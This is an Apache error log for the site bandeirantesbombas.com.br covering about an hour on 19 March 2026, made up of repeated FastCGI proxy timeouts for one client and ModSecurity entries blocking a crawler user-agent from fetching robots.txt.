[Thu Mar 19 20:09:41.057913 2026] [proxy_fcgi:error] [pid 7235:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:10:02.069864 2026] [proxy_fcgi:error] [pid 20435:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:10:23.037835 2026] [proxy_fcgi:error] [pid 5816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:10:44.133842 2026] [proxy_fcgi:error] [pid 7545:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:44904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:11:05.120525 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:11:36.493904 2026] [proxy_fcgi:error] [pid 7235:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:11:39.319667 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.244.43:57988] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyCq_u8EFLIOrSqIpvVlgAAAlY"]
[Thu Mar 19 20:12:12.002177 2026] [proxy_fcgi:error] [pid 19655:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:12:43.466311 2026] [proxy_fcgi:error] [pid 20435:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:12:53.697454 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.228.61:47248] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyC9da6ubjKNq_cu4aCwQAAA0A"]
[Thu Mar 19 20:13:05.049941 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45616] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:13:26.657791 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45772] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:13:49.429817 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:14:13.033842 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:46066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:14:46.505640 2026] [proxy_fcgi:error] [pid 17653:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:15:12.001835 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:46414] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:15:35.502721 2026] [proxy_fcgi:error] [pid 7235:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:16:00.237382 2026] [proxy_fcgi:error] [pid 7235:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46854] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:16:26.517790 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:16:50.877804 2026] [proxy_fcgi:error] [pid 21563:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:17:12.471771 2026] [proxy_fcgi:error] [pid 7235:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47354] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:17:25.507342 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.244.43:60328] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyEBQbLMZ6AikZjR9WJvQAAAAg"]
[Thu Mar 19 20:17:38.724299 2026] [proxy_fcgi:error] [pid 19655:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:47468] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:18:17.925812 2026] [proxy_fcgi:error] [pid 26799:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:18:49.710673 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.228.61:41100] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyEWf-YZRR_7pZ7nDK5bwAAA9A"]
[Thu Mar 19 20:18:52.691423 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47634] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:19:14.589826 2026] [proxy_fcgi:error] [pid 7545:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:19:36.389897 2026] [proxy_fcgi:error] [pid 7545:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:20:14.129926 2026] [proxy_fcgi:error] [pid 27293:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48152] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:20:41.425804 2026] [proxy_fcgi:error] [pid 7235:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:48242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:21:32.745908 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48332] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:22:16.522352 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:48462] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:22:46.230076 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:48624] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:23:07.337798 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48836] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:23:29.065902 2026] [proxy_fcgi:error] [pid 14269:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:23:52.732922 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:49464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:24:27.493795 2026] [proxy_fcgi:error] [pid 7545:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:24:55.587919 2026] [:error] [pid 19655:tid 140411548894976] [client 74.7.228.61:48160] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyFx01ujooLWdUDGy4CxAAAAFc"]
[Thu Mar 19 20:25:23.333785 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:25:45.486159 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:50084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:26:32.853994 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:50232] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:27:21.560625 2026] [:error] [pid 8307:tid 140411716749056] [client 74.7.244.43:37306] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyGWb-FhjpZGs9ba8qYqwAAAwM"]
[Thu Mar 19 20:27:41.474970 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:28:30.949966 2026] [proxy_fcgi:error] [pid 7545:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:28:56.465857 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:50536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:29:20.282506 2026] [proxy_fcgi:error] [pid 5816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:29:55.289092 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:30:24.131153 2026] [:error] [pid 5816:tid 140411649607424] [client 74.7.228.61:42886] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyHDpfmNfuxceSuAELBvAAAAcs"]
[Thu Mar 19 20:30:29.713810 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:31:33.247755 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:32:13.945830 2026] [proxy_fcgi:error] [pid 26799:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51168] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:32:22.209404 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.244.43:56244] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyHhuoXxyEfFpUF8f86wgAAAVE"]
[Thu Mar 19 20:32:35.241826 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51370] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:32:58.113857 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:33:39.025971 2026] [proxy_fcgi:error] [pid 7545:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:34:15.230077 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:51652] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:35:02.436021 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:51720] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:35:24.600247 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:51796] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:35:37.901909 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.228.61:49020] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyISQkwaGbbGflqUZD5DQAAAMQ"]
[Thu Mar 19 20:35:49.485892 2026] [proxy_fcgi:error] [pid 21563:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:52190] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:37:15.357806 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:37:39.719006 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52594] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:37:39.972415 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.244.43:45864] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyIw-oXxyEfFpUF8f865wAAAUk"]
[Thu Mar 19 20:38:01.060726 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52768] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:38:39.149785 2026] [proxy_fcgi:error] [pid 7545:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:52810] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:39:05.563826 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:52878] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:39:38.959001 2026] [proxy_fcgi:error] [pid 8307:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52992] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:40:14.537971 2026] [proxy_fcgi:error] [pid 21563:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:40:38.590142 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53104] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:41:00.136154 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:41:27.106072 2026] [proxy_fcgi:error] [pid 21563:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:41:37.891310 2026] [:error] [pid 7545:tid 140411590858496] [client 74.7.228.61:35544] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyJsX8B84UptSoTJtY9AAAAAZI"]
[Thu Mar 19 20:42:14.970080 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] [client 179.188.53.243:53496] AH01067: Failed to read FastCGI header
[Thu Mar 19 20:42:14.970138 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (104)Connection reset by peer: [client 179.188.53.243:53496] AH01075: Error dispatching request to : 
[Thu Mar 19 20:42:44.893785 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:43:06.456257 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53678] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:43:39.275518 2026] [proxy_fcgi:error] [pid 7545:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53780] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:44:05.681710 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:45:14.658514 2026] [proxy_fcgi:error] [pid 21563:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:45:42.405894 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:46:04.032203 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54406] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:46:26.065831 2026] [proxy_fcgi:error] [pid 7545:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:47:16.925918 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:47:26.467738 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.228.61:55942] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyLDhCii7xarUs8iHYYSQAAAgs"]
[Thu Mar 19 20:47:42.965836 2026] [:error] [pid 19655:tid 140411607643904] [client 74.7.244.43:43628] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyLHk1ujooLWdUDGy4DKwAAAFA"]
[Thu Mar 19 20:48:14.537850 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54660] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:48:38.693916 2026] [proxy_fcgi:error] [pid 5816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:54776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:49:00.133856 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:55064] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:49:21.046085 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:49:42.100806 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55310] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:50:42.437932 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55378] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:51:26.497913 2026] [proxy_fcgi:error] [pid 7545:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:52:15.393862 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:55622] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:52:40.349913 2026] [proxy_fcgi:error] [pid 14269:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:53:02.156559 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:53:24.057952 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56450] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:53:56.011546 2026] [proxy_fcgi:error] [pid 7235:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56528] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:54:02.769378 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.244.43:35206] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyMmvXLqtnMIWvjpaJMmwAAAo4"]
[Thu Mar 19 20:55:56.485927 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:56:20.130668 2026] [proxy_fcgi:error] [pid 26799:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:57074] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:57:02.455924 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:57336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:57:24.341825 2026] [proxy_fcgi:error] [pid 5816:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57478] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:58:55.333905 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:59:24.202133 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57704] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:59:45.449851 2026] [proxy_fcgi:error] [pid 7893:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57872] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:00:35.337779 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58002] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:02:03.681851 2026] [proxy_fcgi:error] [pid 19655:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:02:48.189585 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58278] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:03:50.225920 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58392] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:04:32.173852 2026] [proxy_fcgi:error] [pid 7893:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:05:17.133814 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:05:39.609834 2026] [proxy_fcgi:error] [pid 5816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58778] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:07:48.302582 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58848] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:08:31.804959 2026] [proxy_fcgi:error] [pid 21563:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59048] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:10:17.229849 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59142] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:11:15.173881 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:11:36.292050 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59494] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:12:37.656324 2026] [proxy_fcgi:error] [pid 20435:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:13:58.689317 2026] [proxy_fcgi:error] [pid 21219:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59858] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:14:39.913851 2026] [proxy_fcgi:error] [pid 7235:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:15:31.033849 2026] [proxy_fcgi:error] [pid 21219:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:16:27.393946 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60118] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:17:06.672281 2026] [proxy_fcgi:error] [pid 21563:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:17:35.425967 2026] [proxy_fcgi:error] [pid 8307:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60468] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:19:00.073860 2026] [proxy_fcgi:error] [pid 21219:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60506] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:20:35.281780 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60604] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:21:17.594965 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:22:15.365875 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60804] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:22:24.271940 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.228.61:45642] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyTQMdf6f5d65gmYZSn5wAAAsE"]
